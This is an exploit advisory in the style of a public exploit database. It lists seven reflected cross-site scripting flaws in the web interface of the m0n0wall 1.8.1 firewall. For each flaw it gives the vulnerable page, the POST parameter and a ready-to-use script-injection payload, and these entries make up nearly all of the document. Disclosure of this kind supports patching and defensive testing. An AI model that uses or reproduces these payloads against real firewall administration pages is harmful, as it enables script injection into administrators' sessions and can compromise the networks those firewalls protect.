##################################################################################################################################
# Exploit Title: m0n0wall 1.8.1 | Cross-Site Scripting
# Date: 02.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://m0n0.ch/wall/index.php
# Software Link:
http://sourceforge.net/projects/archiveos/files/m/monowall/generic-pc-1.8.1.iso/download
# Version: 1.8.1
##################################################################################################################################

Introduction
m0n0wall is a project aimed at creating a complete, embedded firewall
software package that, when used together with an embedded PC, provides all
the important features of commercial firewall boxes (including ease of use)
at a fraction of the price (free software).
m0n0wall is based on a bare-bones version of FreeBSD, along with a web
server, PHP and a few other utilities. The entire system configuration is
stored in one single XML text file to keep things transparent.
m0n0wall is probably the first UNIX system that has its boot-time
configuration done with PHP, rather than the usual shell scripts, and that
has the entire system configuration stored in XML format.


#################################################################################


XSS details: Reflected

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotenet

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotegw

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1myident

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1lifetime

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p2lifetime

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
http://192.168.2.200/diag_ping.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(7)</script>

#################################################################################